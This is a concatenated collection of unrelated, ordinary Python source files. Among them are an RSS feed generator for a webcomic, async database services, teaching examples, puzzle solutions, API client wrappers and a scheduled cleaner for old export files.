    Returns a dict with keys: dateFormatted, imageUrl, date, title, url, ad.
    """
    if PY2:
        html = urllib2.urlopen(url).read()
    else:
        html = requests.get(url).text
    section = findSection(html, '<tbody class="style5">', '</table>')
    imageHtml = findSection(section, '<img', '>')
    comic_date = findSection(imageHtml, 'btphp/comics/', '.gif')
    result = {
        'dateFormatted': findSection(section, '<nobr>', ': </nobr>').strip(),
        'imageUrl': 'http://sinfest.net/' + findSection(imageHtml, 'src="', '"'),
        'date': comic_date,
        'title': findSection(imageHtml, 'alt="', '"'),
        'url': 'http://sinfest.net/view.php?date=%s' % (comic_date),
        # sinfest no longer uses Project Wonderful and new ads don't seem to
        # have a noscript section
        'ad': '',
    }
    return result
# Fetch today's comic; fall back to a stub entry so the feed still renders.
try:
    todaysSinfest = getData('http://sinfest.net/')
except Exception as e:
    print(e)
    today = datetime.date.today()
    todaysSinfest = {'title': 'could not fetch', 'url': '', 'imageUrl': '',
                     'dateFormatted': today.strftime('%d %b %Y'),
                     'date': today.strftime('%Y-%m-%d') }
# Create the feed.
feed = Feed()
# Set the feed/channel level properties.
feed.feed['title'] = 'Sinfest RSS'
feed.feed['link'] = 'http://www.sinfest.net'
feed.feed['author'] = 'Tatsuya Ishida'
feed.feed['description'] = 'RSS feed for Sinfest'
# Suggest checking every 12 hours. Normally content will update every 24 hours.
# This is an attempt to tell clients there's no point checking the feed
# every 5 minutes - it's not a big deal load-wise, but it is pointless.
feed.feed['ttl'] = '720'
# Create an item.
# For this basic feed, I'll only include the latest comic.
item = {}
item['link'] = todaysSinfest['url']
item['guid'] = todaysSinfest['date']
item["pubDate"] = time.localtime()
item['title'] = 'Sinfest for %s: %s' % (todaysSinfest['dateFormatted'], todaysSinfest['title'])
# Embed the comic image in the summary when one was found.
if todaysSinfest['imageUrl'] != '':
    item['summary'] = '<img src="%s" /><br/><br/>%s' % (todaysSinfest['imageUrl'], todaysSinfest['ad'])
else:
    item['summary'] = 'image not found'
# Add item to feed.
feed.items.append(item)
# Save the feed to a file.
with open('rss2.xml', 'w') as f:
    f.write(feed.format_rss2_string())
    f.write('\n') # Ensure file ends in EOL
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__license__ = ''
__version__ = '1.0.1'
from sanic.log import logger
from sanic.request import Request
from .specification.get_account_type_specification import (
get_account_type_list_query, get_account_type_list_count_query, get_account_type_list_dropdown_query
)
__all__ = [
# SERVICES WORKING ON ACCOUNT TYPE TABLE
'get_account_type_list', 'get_account_type_list_count', 'get_account_type_dropdown_list'
]
async def get_account_type_list(request: Request, name=None, limit: int = 0, offset: int = 0) -> list:
    """ Get account_type list ordered by account_type id desc.
    :param request: Sanic request carrying the asyncpg pool at app.pg
    :param name: optional name filter, bound to $1
    :param limit: page size; 0 disables paging
    :param offset: page start, used only when limit > 0
    :return: list of row dicts (empty on error)
    """
    ret_val = []
    query_str = get_account_type_list_query
    try:
        if limit > 0:
            # BUG FIX: ORDER BY must come before LIMIT/OFFSET; the original
            # appended ' LIMIT $2 OFFSET $3 ORDER BY atc.id DESC;', which is
            # invalid SQL and fails when the statement is prepared.
            query_str += ' ORDER BY atc.id DESC LIMIT $2 OFFSET $3;'
            async with request.app.pg.acquire() as connection:
                rows = await connection.fetch(query_str, name, limit, offset)
        else:
            query_str += ' ORDER BY atc.id DESC;'
            async with request.app.pg.acquire() as connection:
                rows = await connection.fetch(query_str, name)
        if rows is not None:
            ret_val = [dict(x) for x in rows]
    except Exception as gclerr:
        logger.error('get_account_type_list service erred with: {}'.format(gclerr))
    return ret_val
async def get_account_type_list_count(request: Request, name=None) -> int:
    """ Return the number of account_type rows matching the optional filter.
    :param request: Sanic request carrying the asyncpg pool at app.pg
    :param name: optional name filter, bound to $1
    :return: row count, or 0 when the query fails
    """
    count = 0
    try:
        async with request.app.pg.acquire() as connection:
            fetched = await connection.fetchval(get_account_type_list_count_query, name)
        if fetched is not None:
            count = fetched
    except Exception as gclcerr:
        logger.error('get_account_type_list_count service erred with: {}'.format(gclcerr))
    return count
async def get_account_type_dropdown_list(request: Request, name=None) -> list:
    """ Return account_type rows for dropdown widgets, newest id first.
    :param request: Sanic request carrying the asyncpg pool at app.pg
    :param name: optional name filter, bound to $1
    :return: list of row dicts (empty on error)
    """
    results = []
    sql = get_account_type_list_dropdown_query + ' ORDER BY atc.id DESC;'
    try:
        async with request.app.pg.acquire() as connection:
            rows = await connection.fetch(sql, name)
        if rows is not None:
            results = [dict(row) for row in rows]
    except Exception as gclerr:
        logger.error('get_account_type_dropdown_list service erred with: {}'.format(gclerr))
    return results
|
# Example of chained if statements.
# `elif` abbreviates "else: if", letting you add one more condition per branch.
idade = 14
if(idade >= 18) :
    print("Já pode tirar CNH!")
elif (idade >= 16):
    print("Já pode VOTAR!")
elif (idade >= 15) :
    print("Já debutou!")
else:
    # With idade = 14, this is the branch that runs.
    print("Você tem menos que 15 anos")
print ("FIM DO CÓDIGO")
|
#!/usr/bin/env python
"""
CTestTestfile.py
==================
This enables ctest running of installed tests,
without the full build tree.
CTestTestfile.cmake files which list unit tests are copied
from the build tree into a newly created tree with only these files.
A top level CTestTestfile.cmake composed of top level subdirs is added,
which allows all tests to be run with a single ctest command.
Usage Example
---------------
Note that the destination directory is deleted and populated on every run
::
[blyth@localhost ~]$ CTestTestfile.py $(opticks-bdir) --dest /tmp/tests
remove dest tree /tmp/tests
Copying CTestTestfile.cmake files from buildtree /home/blyth/local/opticks/build into a new destination tree /tmp/tests
write testfile to /tmp/tests/CTestTestfile.cmake
Workflow
-----------
::
CTestTestfile.py $(opticks-bdir) --dest /tmp/tests
cd /tmp/tests
ctest.sh
simple ctest wrapper to tee ctest.log and set non-interactive options
ctest -N
list names of tests without running them
ctest -N -R SysRapTest.SEnvTest
ctest -N -R IntegrationTests
list tests matching a patterm
ctest -R IntegrationTests --output-on-failure
run tests matching a pattern
"""
import sys, re, os, logging, argparse, shutil
from opticks.bin.CMakeLists import OpticksCMakeProj
log = logging.getLogger(__name__)
class BuildTree(object):
    """Mirror of a CMake build tree keeping only CTestTestfile.cmake files."""
    NAME = "CTestTestfile.cmake"
    SKIPDIRS = ["CMakeFiles", "Testing", ]
    def __init__(self, root, projs):
        self.root = root
        self.projs = projs
        log.info("root %s " % root)
        log.info("projs %r " % projs)
    def filtercopy(self, dstbase):
        """Copy each project subtree into dstbase keeping only test manifests;
        return the path of the top-level CTestTestfile.cmake in dstbase."""
        for proj in self.projs:
            source_dir = os.path.join(self.root, proj)
            target_dir = os.path.join(dstbase, proj)
            if os.path.isdir(target_dir):
                log.debug("remove dst tree %s " % target_dir )
                shutil.rmtree( target_dir )
            shutil.copytree( source_dir, target_dir, symlinks=False, ignore=self )
        return os.path.join( dstbase, self.NAME )
    def skipdir(self, name):
        """True for build-system directories that must not be copied."""
        return name in self.SKIPDIRS
    def skipfile(self, name):
        """True for every file except the CTest test manifest."""
        return name != self.NAME
    def __call__(self, src, names):
        """shutil.copytree ignore-callback: return the entries under src to skip."""
        ignored = []
        for entry in names:
            full = os.path.join(src, entry)
            wanted_dir = os.path.isdir(full) and not self.skipdir(entry)
            wanted_file = os.path.isfile(full) and not self.skipfile(entry)
            if not (wanted_dir or wanted_file):
                ignored.append(entry)
        return ignored
if __name__ == '__main__':
    parser = argparse.ArgumentParser(__doc__)
    parser.add_argument( "root", nargs=1, help="Base directory in which to look for CTestTestfile.cmake " )
    parser.add_argument( "--home", default=os.path.expandvars("$OPTICKS_HOME"), help="source HOME under which to look for CMakeLists.txt" )
    parser.add_argument( "--level", default="info", help="logging level" )
    parser.add_argument( "--dest", default="/tmp/tests", help="destination directory tree to be removed, recreated and populated" )
    args = parser.parse_args()
    fmt = '[%(asctime)s] p%(process)s {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s'
    logging.basicConfig(level=getattr(logging,args.level.upper()), format=fmt)
    # Discover project subdirectories from the source tree's CMakeLists.
    ok = OpticksCMakeProj(args.home)
    bdir = args.root[0]
    dest = args.dest
    # Mirror only the CTestTestfile.cmake files into dest, then write the
    # top-level manifest so ctest can run every test from one directory.
    bt = BuildTree(bdir, projs=ok.subdirs)
    top = bt.filtercopy( dest )
    log.info("Copying %s files from buildtree %s into a new destination tree %s " % (BuildTree.NAME, bdir, dest ))
    log.info("write testfile to %s " % top )
    ok.write_testfile( top )
|
# -*- coding: utf-8 -*-
import cloud
import collections
import datetime
from request import Request
# Per-run queue name prefixes; a timestamp suffix is appended at connect time.
REQUEST_QUEUE_PREFIX = 'picrawler_request_'
RESULT_QUEUE_PREFIX = 'picrawler_result_'
class InvalidRequest(Exception):
    """Raised when send() receives something that is not a URL or Request."""
    pass
class PiCloudConnection(object):
    """Class that represents a connection to PiCloud.
    Usage:
    >>> from picrawler import PiCloudConnection
    >>> with PiCloudConnection() as conn:
    ...     response = conn.send(['http://www.wikipedia.org'])
    ...     print 'status code:', response[0].status_code
    ...     print 'content:', response[0].content[:15]
    status code: 200
    content: <!DOCTYPE html>
    :param int max_parallel_jobs: (optional) The number of parallel jobs to run.
    :param str core_type: (optional) PiCloud core type.

    NOTE: this module is Python 2 code (``basestring``, the doctest above).
    """
    def __init__(self, max_parallel_jobs=10, core_type='s1'):
        self._max_parallel_jobs = max_parallel_jobs
        self._core_type = core_type
        self._connected = False
    def __enter__(self):
        # Context-manager entry: connect lazily on first use.
        if not self._connected:
            self.connect()
        return self
    def __exit__(self, type, value, traceback):
        self.close()
    @property
    def is_connected(self):
        # True once connect() has succeeded and close() has not been called.
        return self._connected
    @property
    def request_queue(self):
        return self._request_queue
    @property
    def result_queue(self):
        return self._result_queue
    def connect(self):
        """Establishes a connection to PiCloud."""
        self._initialize_queues()
        self._connected = True
    def close(self):
        """Closes the connection."""
        assert self._connected, 'The connection to PiCloud has not been established.'
        self._destroy_queues()
        cloud.close()
        self._connected = False
    def send(self, req):
        """Sends the requests to PiCloud.
        :param req: Requests to be sended to PiCloud. Must be one of the following:
            * A string that contains a URL
            * A list or a tuple or an iteratable that consists of URL strings
            * A :class:`Request <picrawler.request.Request>` instance
            * An list or a tuple or an iteratable that consists of :class:`Request <picrawler.request.Request>` instance
        :return: List of :class:`BaseResponse <picrawler.response.BaseResponse>` instances,
            in the same order as the input requests.
        """
        assert self._connected, 'The connection to PiCloud has not been established.'
        # covert req into a list of Request instances
        if isinstance(req, basestring):
            requests = [Request(req)]
        elif isinstance(req, Request):
            requests = [req]
        elif isinstance(req, collections.Iterable):
            requests = []
            for request in req:
                if isinstance(request, Request):
                    requests.append(request)
                elif isinstance(request, basestring):
                    requests.append(Request(request))
                else:
                    raise InvalidRequest('Invalid request item')
        else:
            raise InvalidRequest('req must be either an instance of the '
                                 'Request class or an iteratable of Request instances')
        # send requests to the PiCloud queue
        self._request_queue.push(requests)
        responses = self._loop()
        # Re-order responses to match the order of the original requests.
        req_resp_map = {}
        for resp in responses:
            req_resp_map[resp.request.id] = resp
        return [req_resp_map.get(r.id) for r in requests]
    def _initialize_queues(self):
        # Timestamp-suffixed queue names keep concurrent runs separate.
        queue_id = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
        self._request_queue = cloud.queue.get(REQUEST_QUEUE_PREFIX + queue_id)
        self._result_queue = cloud.queue.get(RESULT_QUEUE_PREFIX + queue_id)
        # attach the request handler to the queue
        self._request_queue.attach(lambda req: req(),
                                   output_queues=[self._result_queue],
                                   max_parallel_jobs=self._max_parallel_jobs,
                                   _type=self._core_type)
    def _destroy_queues(self):
        self._request_queue.delete()
        self._result_queue.delete()
        self._request_queue = None
        self._result_queue = None
    def _loop(self):
        """Drain the result queue until all pushed requests have completed.

        NOTE(review): this polls with timeout=0 and no sleep — a busy-wait;
        completion is only re-checked every third iteration.
        """
        gathered_responses = []
        c = 0
        while True:
            # get the results
            responses = self._result_queue.pop(timeout=0)
            if responses:
                for response in responses:
                    response.run_callback()
                gathered_responses += responses
            # break the loop if completed
            if c % 3 == 0 and self._requests_completed():
                break
            c += 1
        return gathered_responses
    def _requests_completed(self):
        # Completed = nothing pending or running on the request queue AND
        # nothing left unread on the result queue.
        request_queue_info = self._request_queue.info()
        if (request_queue_info['count'] == 0 and
                request_queue_info['processing_jobs'] == 0 and
                request_queue_info['queued_jobs'] == 0):
            # exit the loop if the result queue is empty
            if self._result_queue.count() == 0:
                return True
        return False
|
# Distribution metadata consumed by the build/packaging scripts.
PACKAGE_NAME = "patchworkdocker"
VERSION = "0.0.0"
# TODO: replace the placeholder description before publishing.
DESCRIPTION = "TODO"
EXECUTABLE_NAME = "patchworkdocker"
|
from collections import defaultdict
from color.lab import LabMatrix
def luminance_histogram_from_matrix(matrix):
    """Count how many pixels carry each L (luminance) value in a Lab matrix.

    `matrix` iterates over (x, y) coordinates and exposes the luminance
    channel as matrix.l[x][y]. Returns a defaultdict of value -> count.
    """
    counts = defaultdict(int)
    for col, row in matrix:
        counts[matrix.l[col][row]] += 1
    return counts
def equalize(image):
    """Histogram-equalize the luminance (L) channel of `image` in place.

    Each distinct luminance is remapped to the cumulative relative frequency
    of all luminances up to and including it, scaled to [0, 100].
    """
    matrix = LabMatrix.from_image(image)
    histogram = luminance_histogram_from_matrix(matrix)
    adjustments = {}
    # PERF FIX: sort the luminance keys once — the original called
    # sorted(histogram.keys()) inside the loop, making this O(n^2 log n).
    ordered = sorted(histogram.keys())
    for i, luminance in enumerate(ordered):
        # NOTE(review): assumes image.size is the total pixel count; for PIL
        # images .size is a (width, height) tuple — confirm the image type.
        relative_count = histogram[luminance] / image.size
        new_value = relative_count * 100
        if i > 0:
            # Accumulate onto the previous luminance's adjusted value (CDF).
            new_value += adjustments[ordered[i - 1]]
        new_value = min(new_value, 100.0)
        adjustments[luminance] = new_value
    # Rewrite every pixel's luminance and push the result back to the image.
    for x, y in matrix:
        matrix.l[x][y] = adjustments[matrix.l[x][y]]
    matrix.apply_to(image)
|
import string
def spin_words(sentence):
    """Reverse every word of five or more letters in `sentence`,
    preserving word order and single-space separation."""
    words = sentence.split(' ')
    for i, word in enumerate(words):
        if len(word) >= 5:
            words[i] = word[::-1]
    # BUG FIX: string.join() was removed in Python 3; use str.join instead.
    return ' '.join(words)
|
# Project Euler problem 4: largest palindrome made from the product of two
# 3-digit numbers.
ans = 0
for i in range(999, 100, -1):
    # PERF: once even i*999 cannot beat the best answer, no smaller i can.
    if i * 999 <= ans:
        break
    for j in range(999, 100, -1):
        mul = i * j
        # Products only shrink as j decreases, so stop this row early.
        if mul <= ans:
            break
        a = str(mul)
        b = "".join(reversed(a))
        if a == b:
            ans = max(ans, mul)
print(ans)
|
from django.contrib import admin
# Register your models here.
from .models import *
# Expose the snippet-sharing models in the Django admin with the default
# ModelAdmin options.
admin.site.register(Language)
admin.site.register(Tag)
admin.site.register(Snippet)
admin.site.register(Comment)
from sqlite3 import *
class manageSqlite:
    """Tiny persistence layer for saved connection profiles (SQLite).

    NOTE: the connection and cursor are class attributes, so every instance
    shares one connection to connections.db.
    """
    file = "connections.db"
    conn = connect(file)
    conn.row_factory = Row
    cursor = conn.cursor()
    def __init__(self):
        # Make sure the backing table exists before any query runs.
        self.cursor.execute(
            'CREATE TABLE IF NOT EXISTS connections (name VARCHAR(20), host VARCHAR(20), port VARCHAR(10), user VARCHAR(50), pwd VARCHAR(50))')
    def addConnect(self, name, host, port, user, pwd):
        """Insert one connection profile and commit it.

        BUG FIX: the original closed the cursor AND the shared connection
        here, so any later call on this (or any other) instance failed.
        Now we only commit.
        """
        self.cursor.execute("INSERT INTO connections(name, host, port, user, pwd) VALUES (?,?,?,?,?)",
                            (name, host, port, user, pwd))
        self.conn.commit()
    def showConnect(self):
        """Return all stored connection rows as sqlite3.Row objects."""
        self.cursor.execute("SELECT * FROM connections")
        return self.cursor.fetchall()
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import dateutil.parser
from ruletypes import RuleType
from util import pretty_ts
from util import ts_to_dt
from util import dt_to_ts
class StatRule(RuleType):
    '''support
    stat function in (sum, )
    stat_type in (greater, less, equal)
    '''
    # NOTE(review): __init__ also requires rules['stat_field'], which is not
    # listed here — a config missing stat_field fails with a raw KeyError.
    required_options = set(['stat', 'threshold', 'stat_type'])
    def __init__(self, *args):
        super(StatRule, self).__init__(*args)
        # Dispatch tables: aggregation function and threshold comparison.
        self.stat_function = {
            'sum':self._sum,
        }
        self.op = {
            'greater':self.greater,
            'less':self.less,
            'equal':self.equal,
        }
        self.ts_field = self.rules.get('timestamp_field', '@timestamp')
        self.stat_field = self.rules['stat_field']
        self.group_by_field = self.rules.get("group_by")
        self.threshold = self.rules['threshold']
        self.stat = self.rules['stat']
        self.stat_type = self.rules['stat_type']
        # History of matched group values, newest last.
        self.match_value = []
    def _sum(self, data):
        # Sum stat_field over all events in the batch.
        return sum([d[self.stat_field] for d in data])
    def greater(self, p1, p2):
        return p1 > p2
    def less(self, p1, p2):
        return p1 < p2
    def equal(self, p1, p2):
        return p1 == p2
    def add_data(self, data):
        # Each incoming batch of events is evaluated immediately.
        self.check_for_match(data)
    def group_by(self, data):
        """Bucket events by group_by_field, skipping events that lack either
        the stat field or the grouping field."""
        group = {}
        for event in data:
            if event.get(self.stat_field) is None or event.get(self.group_by_field) is None:
                continue
            field_value = event[self.group_by_field]
            group.setdefault(field_value, [])
            group[field_value].append(event)
        return group
    def check_for_match(self,data):
        """Aggregate the batch (optionally per group) and compare each
        aggregate against the threshold with the configured operator."""
        stat_func = self.stat_function.get(self.stat)
        stat_value_dict = {}
        if not self.group_by_field:
            stat_value_dict['all'] = stat_func(data)
        else:
            group_data = self.group_by(data)
            # NOTE: dict.iteritems() is Python 2-only.
            for field_value, _data in group_data.iteritems():
                stat_value_dict[field_value] = stat_func(_data)
        match_success = False
        match_value = []
        for field_value, stat_value in stat_value_dict.iteritems():
            match_success = self.op.get(self.stat_type)(stat_value, self.threshold)
            if match_success:
                match_value.append(field_value)
        if match_value:
            self.match_value.append(match_value)
        # NOTE(review): only the LAST group's comparison decides whether a
        # match is recorded (dict order) — possibly `if match_value:` was
        # intended; confirm before changing alert semantics.
        if match_success:
            self.add_match(data[0])
    def get_match_str(self, match):
        """Build the human-readable alert text for a match (shows at most
        the first five matched group values)."""
        ts = match[self.rules['timestamp_field']]
        lt = self.rules.get('use_local_time')
        try:
            match_value = self.match_value[-1][:5]
        except:
            match_value = []
        message = "Between %s and %s\n" % (pretty_ts(dt_to_ts(ts_to_dt(ts) - self.rules['timeframe']), lt), pretty_ts(ts, lt))
        message += "%s(%s) %s %s\nmatch value:\n\t%s...\n\n" % (
            self.rules['stat'],
            self.rules['stat_field'],
            self.rules['stat_type'],
            self.rules['threshold'],
            '\n\t'.join(match_value)
        )
        return message
    def garbage_collect(self, timestamp):
        # NOTE(review): [:-1] drops the NEWEST entry and keeps older ones —
        # possibly [-1:] (keep only the latest) was intended; confirm.
        if len(self.match_value) > 1:
            self.match_value = self.match_value[:-1]
|
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 4 17:05:40 2019
@author: giuseppec
"""
import pandas as pd
import os
# Folder holding one CSV per topic produced by the topic-modelling step.
directory='C:/Users/giuseppec/Desktop/PYTHONTopicModelling/topics'
df=[]
i=0
# Read every file in the folder into a DataFrame; i counts files loaded.
for f in os.listdir(directory):
    with open(os.path.join(directory, f), mode='r') as file:
        #print(file.name)
        df.append(pd.read_csv(file.name, sep=',', encoding='latin-1', engine='python'))
        #print(df[i])
        i = i+1
|
import android
droid = android.Android()
# Resolve the Intent constants (e.g. ACTION_VIEW) from the Android SDK
# through the SL4A bridge.
myconst = droid.getConstants("android.content.Intent").result
action = myconst['ACTION_VIEW']
# Contacts content URI; the MIME type selects the call-log cursor view.
uri = "content://android.provider.Contacts.People.CONTENT_URI"
itype = "vnd.android.cursor.dir/calls"
# Build the intent and hand it to the Android activity manager.
intent = droid.makeIntent(action, uri, itype).result
droid.startActivityIntent(intent)
|
from pydantic import BaseModel
class Todo(BaseModel):
    """Pydantic request/response schema for a todo item."""
    # Short title of the task.
    title:str
    # Longer free-text description of the task.
    description:str
# array
import array
class BinaryTree:
    """Binary tree stored implicitly in an array: the children of the node
    at index i live at indices 2i+1 and 2i+2."""
    def __init__(self, arr):
        self.array = array.array('l', arr)
    def preorder(self):
        """Print node values in root-left-right order, space separated."""
        tokens = []
        def walk(node):
            if node < len(self.array):
                tokens.append(str(self.array[node]))
                walk(2 * node + 1)
                walk(2 * node + 2)
        walk(0)
        print(''.join(token + ' ' for token in tokens))
    def inorder(self):
        """Print node values in left-root-right order, space separated."""
        tokens = []
        def walk(node):
            if node < len(self.array):
                walk(2 * node + 1)
                tokens.append(str(self.array[node]))
                walk(2 * node + 2)
        walk(0)
        print(''.join(token + ' ' for token in tokens))
    def postorder(self):
        """Print node values in left-right-root order, space separated."""
        tokens = []
        def walk(node):
            if node < len(self.array):
                walk(2 * node + 1)
                walk(2 * node + 2)
                tokens.append(str(self.array[node]))
        walk(0)
        print(''.join(token + ' ' for token in tokens))
    def bfs(self, value):
        """Breadth-first search: array order IS level order, so a linear
        scan visits nodes breadth-first."""
        return any(item == value for item in self.array)
    def dfs(self, value):
        """Depth-first (preorder) search for `value`; returns True/False."""
        found = False
        def walk(node):
            nonlocal found
            if node >= len(self.array) or found:
                return
            if self.array[node] == value:
                found = True
            walk(2 * node + 1)
            walk(2 * node + 2)
        walk(0)
        return found
if __name__=="__main__":
    # Demo: build a complete tree of 1..6, print all traversals, then search.
    binaryTree = BinaryTree([1,2,3,4,5,6])
    binaryTree.preorder()
    binaryTree.inorder()
    binaryTree.postorder()
    print(binaryTree.bfs(3))
    print(binaryTree.dfs(3))
# from .models import model1
# from django import forms
# class form1(forms.ModelForm):
# class Meta:
# model = model1
# exclude=() |
# A number that never forms a palindrome through the reverse and add process
# is called a Lychrel number.
# For every number below ten-thousand, it will either
# (i) become a palindrome in less than fifty iterations, or,
# (ii) no one, with all the computing power that exists, has managed so
# far to map it to a palindrome.
# Find the number of Lychrel numbers below ten thousand.
LIMIT = 10**4
MAX_ITERATION = 50
def countLychrelNum():
    """Count the Lychrel numbers in [1, LIMIT)."""
    return sum(1 for candidate in range(1, LIMIT) if isLychrelNum(candidate))
def isLychrelNum(N):
    """Return True if N (a positive integer below ten thousand) does not
    reach a palindrome within MAX_ITERATION reverse-and-add steps."""
    current = N
    for _ in range(MAX_ITERATION):
        current += reverseNum(current)
        if isPalindrome(current):
            return False
    return True
def reverseNum(N):
    """Return the number whose decimal digits are those of N reversed."""
    reversed_value = 0
    remaining = N
    while remaining:
        reversed_value = 10 * reversed_value + remaining % 10
        remaining //= 10
    return reversed_value
def isPalindrome(N):
    """Return True if the decimal representation of N is a palindrome."""
    return reverseNum(N) == N
|
from .client import Client
class Tokens(Client):
    """Etherscan token API wrapper: total supply and per-address balances."""
    def __init__(self, tokenname='TheDAO', api_key='YourApiKeyToken'):
        Client.__init__(self, address='', api_key=api_key)
        self.tokenname = '&tokenname=' + tokenname
    def make_url(self, call_type=''):
        """Assemble self.url for the given API call type; unknown call types
        leave self.url untouched."""
        parts = [self.URL_BASES['prefix'], self.module, self.action, self.tokenname]
        if call_type == 'tokensupply':
            parts.append(self.key)
        elif call_type == 'tokenbalance':
            parts.append(self.address)
            parts.append(self.key)
        else:
            return
        self.url = ''.join(parts)
    def get_total_supply(self):
        """Query the API for the token's total supply."""
        self.action = self.URL_BASES['action'] + 'tokensupply'
        self.module = self.URL_BASES['module'] + 'stats'
        self.make_url(call_type='tokensupply')
        return self.connect()['result']
    def get_token_balance(self, address):
        """Query the API for the token balance held by `address`."""
        self.address = self.URL_BASES['address'] + address
        self.module = self.URL_BASES['module'] + 'account'
        self.action = self.URL_BASES['action'] + 'tokenbalance'
        self.make_url(call_type='tokenbalance')
        return self.connect()['result']
|
"""Module deletes old files"""
import atexit
import os
import time
from apscheduler.schedulers.background import BackgroundScheduler
PATH_TO_EXPORT_FILES = os.environ.get('PATH_TO_EXPORT_FILES')
def delete_files():
    """Deletes files that were created more than 15 minutes ago"""
    cutoff = time.time() - 15 * 60
    for entry in os.listdir(PATH_TO_EXPORT_FILES):
        full_path = os.path.join(PATH_TO_EXPORT_FILES, entry)
        if os.stat(full_path).st_mtime < cutoff:
            os.remove(full_path)
# Run the cleanup job once a minute on a daemon background thread.
SCHEDULER = BackgroundScheduler(daemon=True)
SCHEDULER.add_job(func=delete_files, trigger="interval", minutes=1)
SCHEDULER.start()
def stop_deleting():
    """stops deleting"""
    SCHEDULER.shutdown()
# Shut the scheduler down cleanly when the interpreter exits.
atexit.register(stop_deleting)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.